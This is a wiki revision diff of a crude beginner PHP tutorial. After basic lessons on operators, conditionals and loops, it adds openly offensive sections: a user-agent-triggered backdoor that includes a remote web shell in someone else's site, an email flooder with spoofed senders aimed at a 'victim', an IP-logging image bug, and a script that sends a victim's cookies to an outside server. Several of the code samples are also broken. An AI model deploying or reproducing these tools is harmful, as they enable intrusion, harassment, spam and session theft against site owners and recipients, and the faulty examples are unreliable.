User Tools

Site Tools

tools:php

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
tools:php [2024/06/03 03:28] – [Logical] Humphrey Boa-Garttools:php [2024/08/06 05:48] (current) – external edit 127.0.0.1
Line 1: Line 1:
-{{wst>iw-import}}+{{wst>iw-cleanup}}
  
 ====== PHP ====== ====== PHP ======
Line 115: Line 115:
 ==== Comparison ==== ==== Comparison ====
  
 +  < Less than
 +  > Greater than
 +  == Equal to
 +  != Not equal
 +  === Identical
 +  !== Not identical
 +  <= Less than or equal to
 +  >= Greater than or equal to
 ==== Conditional statements and loops ==== ==== Conditional statements and loops ====
  
 +Now you have a basic understanding of printing things, now it's time to start something else. We will explore loops and conditional statements. Loops will pretty much do something a certain amount of times and conditional statements control what the program does if a condition is fulfilled or not.
 ==== Conditional statements ==== ==== Conditional statements ====
  
 +Well, it's basically just if and switch, but the former is pretty useful. You have to know this one.
 ==== If ==== ==== If ====
  
 +This essentially checks whether or not a condition is true.
 +
 +  <?php
 +  $willdo = true;
 +  if($willdo == true){
 +     echo "did";
 +  }
 +  ?>
 +  
 +An else statement is an addition to an if statement which allows for another condition. If there's an else statement something happens regardless.
 +
 +  <?php
 +  $wontdo = false;
 +  if($wontdo == true){
 +     echo "did";
 +  } else {
 +     echo "didn't";
 +  }
 +  ?>
 +
 +Else if statements allow for multiple conditions, if and only if the first condition before it was false.
 +
 +  <?php
 +  $maydo = 99;
 +  $maynotdo = false;
 +  if($maynotdo == true){
 +     echo "did";
 +  } elseif ($maydo == 99){
 +     echo "did anyway";
 +  } else {
 +     echo "didn't";
 +  }
 +  ?>
 +
 +Also:
 +
 +  - Conditions in parentheses just have to be true. You don't have to use an == or != if it's a boolean value (true/false) 
 +  - There are logical operators like and (&&) and or (||)
 +  - a ! behind it means it's false, so if $dick is true, !$dick is false, and vice versa if $dick was false.
 ==== Switch ==== ==== Switch ====
  
 +A substitute to a whole bunch of elseifs. It tests if a given value is equal to something. Cases can be any value. There's also a default.
 +
 +  <?php
 +  switch ($value) {
 +  case false:
 +     echo "value is 0";
 +     break;
 +  case 17:
 +     echo "value is 1";
 +     break;
 +  case "pigdog":
 +     echo "value is pigdog";
 +     break;
 +  case NULL:
 +     echo "value is null";
 +     break;
 +  default:
 +     echo "value is something else other than 0, 1, pigdog, or null.";
 +     break;
 +  }
 +  ?>
 ===== Loops ===== ===== Loops =====
  
 +There are three main loops: for loops, foreach loops, and while/do-while loops.
 ==== For loops ==== ==== For loops ====
  
 +For this loop you simply declare a variable as a counter, and the loop will occur as many times as you want it until the counter reaches a certain number.
 +
 +  <?php
 +  $counter = 0; 
 +  for($counter = 0; $counter < 6; $counter++)
 +    {
 +    echo "HAI
 +  ";
 +   }
 +  ?>
 +
 +What this code does is take the variable we made, and use it as a counter. As long as the variable, $counter, is less than 6, the ++ operator will add one to the value of $counter and then the code within the curly braces {} will be executed. So the output of this code is:
 +
 +HAI
 +
 +HAI
 +
 +HAI
 +
 +HAI
 +
 +HAI
 +
 +Some notes about this code:
 +
 +1. The ++ operator adds one to a variable, and can be used on any variable. This is an example of a unary operator. You could also use -- to subtract one from the variable. 2. Notice that the for loop did NOT end in a semicolon. This is intended. Loops and conditionals don't need a semicolon. But the code inside of the curly braces DOES need the semicolons.
 ==== Foreach loops ==== ==== Foreach loops ====
  
 +This statement essentially sets the number of times something's done. In PHP you use it on arrays to run through every element in an array to do something or another.
 +
 +  <?php
 +  $lolarray = array("lol", "rofl", "lmao");
 +  foreach($lolarray as $value){
 +     echo $value . "</br">;
 +  }
 +  ?>
 +
 +This code will output:
 +
 +lol
 +
 +rofl
 +
 +lmao
 +
 +Also:
 +
 +1. you might want to unset(), or destroy the variable you use. You never know. 2. foreach($array as $key => $value) will assign $key as a key, but it's basically the same.
 ==== While loops ==== ==== While loops ====
  
 +This is probably the simplest loop there is. As long as a condition is true, this loop will run. If the condition is false or if break is used it'll stop the loop. Be careful not to create an infinite loop or your internets will explode; also, if the conditions aren't met or defined the code inside won't run.
 +
 +Like this.
 +
 +  <?php
 +  $fuckme = false;
 +  while($fuckme){ /* or while($fuckme == true) */
 +     echo "This loop won't run.\n";
 +  }
 +
 +But this will run.
 +
 +  $fucku = 17;
 +  while($fucku == 17){
 +     echo "This loop will run. Infinitely.\n";
 +  }
 +  ?>
 +
 +This one will run too, but it'll stop after a while. (you would use a for loop in this position though)
 +
 +  <?php
 +  $lolwut = 0
 +  while($lolwut <= 5){
 +     $lolkay = 5 - $lolwut;
 +     echo "This will run for ". $lolkay ." more times after this..\n";
 +     $lolwut++;
 +  }
 +  echo "Done.";
 +  ?>
 +
 +This will produce:
 +
 +This will run for 5 more times.
 +
 +This will run for 4 more times.
 +
 +This will run for 3 more times.
 +
 +This will run for 2 more times.
 +
 +This will run for 1 more times.
 +
 +This will run for 0 more times.
 +
 +Done.
 +
 +This isn't as useful as you imagine though.
 ==== Do-while loops ==== ==== Do-while loops ====
  
 +This does the same thing as a while loop but it checks the condition after the action's done. If the condition's true it repeats itself, but if it's false it does it once and only once.
 +
 +  <?php
 +  $doit = false;
 +  do {
 +    echo "Did it anyway, lol";
 +  } while ($doit);
 +  ?>
 +
 +This is useful if you want the code run at least once but not necessarily further times.
 ==== Simple Backdoor in PHP ==== ==== Simple Backdoor in PHP ====
  
 +Because many of you want to go straight to the uber hax, I'll add this little bit in. Please stop reading and Google up the following if you don't know this already:
 +
 +1. Basic Understanding of PHP 2. Remote File Inclusion 3. Basic web hacking 4. Web shell (c99, x2300 Locus7s, r57, etc.) 5. User Agents and how to change them
 +
 +Now that you have an idea of what these are, here is how to backdoor a page. If you have access to someone's website, you can slip in this little bit into the PHP page to backdoor their site. When you visit that page with the specified user agent, a web shell will automatically be included. Backdooring a site is recommended for most purposes, because if the site fixes whatever vulnerability you used to get in, you'll still have access. Anyways here is the backdoor:
 +
 +  <?php
 +  $blackdoor = $_SERVER['HTTP_USER_AGENT']; 
 +  if($blackdoor == "PUT YOUR USER AGENT HERE) 
 +   
 +    @include('PUTTHEURLTOYOURWEBSHELLHERE'); 
 +   
 +  ?>
 ==== Email flooder in PHP ==== ==== Email flooder in PHP ====
  
-===== Image bugs =====+If you want to just copy this and run it off a server, go ahead. Unfortunately most free PHP hosts don't allow you to send mail, but I guess you can run it off your localhost. You must have access to the sendmail binary on your system to run; it's just a matter of configuring php.ini, which I won't go into now. 
 + 
 +You need to have: 
 + 
 +1. a server 2. basic knowledge of PHP 3. knowledge on how to install/configure your PHP (pop quiz: should register_globals be kept on or off?) 
 + 
 +  <?php 
 +     $spam= $_POST["spams"];  
 +  // define number of spam cycles 
 +   
 +     $iloled = $_POST["message"]; 
 +  // this is the message 
 +   
 +     $email = $_POST["email"]; 
 +  // define recipient 
 +   
 +     $rofl = $_POST["body"]; 
 +  // your message 
 +   
 +     function head() { 
 +        $sender = $_POST["sender"]; 
 +        $header = 'MIME-Version: 1.0 \r\n 
 +     Content-type: text/html; charset=iso-8859-1 \r\n 
 +     From: <' . $sender . '>'; 
 +   
 +        return($header); 
 +     } 
 +  // spoofed header. i found it easier to write it this way. 
 +   
 +     if(isset($_POST["email"])) { 
 +        for($i = 1; $i <= $spam; $i++){ 
 +   
 +           for($ii = 0; $ii <= $_POST["spams"]; $ii++){ 
 +   
 +              mail($_POST["email"], $iloled,$rofl,head()); 
 +   
 +           } // (the second for loop) defines one cycle 
 +   
 +           echo "Done $i loops of $spam 
 +  "; //we're done 
 +    
 +        } 
 +     echo "Complete.";  
 +     } 
 +     else { 
 +   /* if the form isn't filled out show it. also, mess around with this  part any way you like. */ 
 +  ?>   
 +  <form method="post" action=""> 
 +   
 +     Victim: <input type="text" size="28" name="email">   
 +      
 +     Message title: <input type="text" size="28" name="message">   
 +      
 +     Sender (spoof it): <input type="text" size="28" name="sender"> 
 +      
 +     Message body: <textarea name="body" cols="28" rows="5"></textarea>   
 +      
 +     Emails per cycle (default 10): <input type="text" size="28" name="spams" value="10">   
 +      
 +     Cycles (default 10):<input type="text" size="28" name="cycles" value="10">  
 +        
 +     <input type="submit" name="submit" value="Click for lulz"> 
 +      
 +  </form>   
 +  <?php  
 +  } 
 +  ?> 
 +   
 +===== Image Bugs ===== 
 + 
 +Pretty fucking simple, really. You insert the following into an e-mail or something: 
 + 
 +
 + 
 +Then in iplulz.php on your server (or whatever you call it), put this code: 
 + 
 +//PROTIP: Make a directory on your server called image.png or any image name, then save the code as index.php in the directory.// 
 + 
 +  <?PHP 
 +  $the_image = "yourimagehere.jpg"; 
 +  $ip_lister = fopen("ip.list", "a+"); 
 +  fwrite($ip_lister, $_SERVER['REMOTE_ADDR'] . " fell for it lol\n"); 
 +  fclose($ip_lister); 
 +  if (!strncasecmp(substr($the_image, strlen($the_image) - 4), ".jpg"))    
 +  $image_mime = "jpeg"; 
 +  else $image_mime = substr($the_image, (strrpos($the_image, '.') + 1)); 
 +  header("Content-Type: image/$image_mime"); 
 +  echo file_get_contents($the_image); 
 +  ?> 
 + 
 +User gets the image, you get their IP added to a list. EVERYONE WINS 
 + 
 +Also, can steel cookies in dat way: 
 + 
 +  <?PHP 
 +  $the_image = "yourimagehere.jpg"; 
 +  $ip_lister fopen("ip.list", "a+"); 
 +  fwrite($ip_lister, $_GET['d0ngz'] . " lol\n"); 
 +  fclose($ip_lister); 
 +  if (!strncasecmp(substr($the_image, strlen($the_image) - 4), ".jpg"))    
 +  $image_mime "jpeg"; 
 +  else $image_mime substr($the_image, (strrpos($the_image, '.') + 1)); 
 +  header("Content-Type: image/$image_mime"); 
 +  echo file_get_contents($the_image); 
 +  ?> 
 + 
 +And in email or whatevastuff put 
 + 
 +  <script> 
 +  document.write("<img src='http://domain.com/index.php?d0ngz="+ document.cookie+"'> 
 +  ') 
 +  </script> 
  
-{{tag>Tools Programming Stubs}}+{{tag>Tools Programming}}
tools/php.1717385336.txt.gz · Last modified: 2024/08/06 05:52 (external edit)

Find this page online at: https://bestpoint.institute/tools/php